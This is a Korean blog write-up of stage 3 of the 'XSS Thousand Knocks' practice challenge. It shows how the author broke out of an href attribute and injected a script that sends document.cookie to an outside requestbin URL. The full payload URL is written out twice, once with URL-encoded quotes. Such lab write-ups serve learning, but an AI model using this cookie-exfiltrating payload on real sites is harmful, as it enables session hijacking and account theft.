수천 번의 노크 XSS 단계 3번 write up
링크를 접속하니 Link라는 href가 하나 있고, 접속을 하면 기존과 같게 접속이 된다.
이거 xss game 5번에서 비슷한 문제를 풀어보았기에 비슷하게 하면 된다고 생각을 했음.
?q=' ' 2번과 같이 넣어놓고 link를 누르면 되는거같다!!!
근데 자꾸 404 not found | nginx로 간다... 음 nginx?
** nginx : 아파치 같은 웹서버인듯하다. 한국에서 27%의 점유율을 가지고 있고, 아파치 보다 더 적은 자원으로 더 빠르게 데이터를 서비스 할 수 있는 웹 서버 소프트웨어이다.
페이지 소스 보기를 하면 <a href="/q=XSS">Link</a> 이렇게 있음을 보게 된다. 그럼 href에서 빠져나와 내가 원하는 스크립트를 실행시키게 해야 되는것같다.
http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="><script>location.href='http://requestbin.fullcontact.com/181sw2j1?a='%2Bdocument.cookie</script>
이렇게 해서 창에서는 되었다! ok가 떴습니다.
그런데 Stage에 넣으면 fail csrf check이 또 떴다. 아까도 html encoding으로 '을 바꿔주면 되는것같다.
'는 %27이다. 이걸 적용해서
http://68e3b596ebf790e8a781b8d87b84af7eb7b0aeb3.knock.xss.moe/?q="><script>location.href=%27http://requestbin.fullcontact.com/181sw2j1?a=%27%2Bdocument.cookie</script>
이렇게 넣으면 성공
'WebHacking > XSS Thousand Knocks Write-Up' 카테고리의 다른 글
| XSS Thousand Knocks Stage4 write up (0) | 2018.07.18 |
|---|---|
| XSS Thousand Knocks Stage2 write up (0) | 2018.07.18 |
| XSS thousand Knocks stage1 writeup (0) | 2018.07.18 |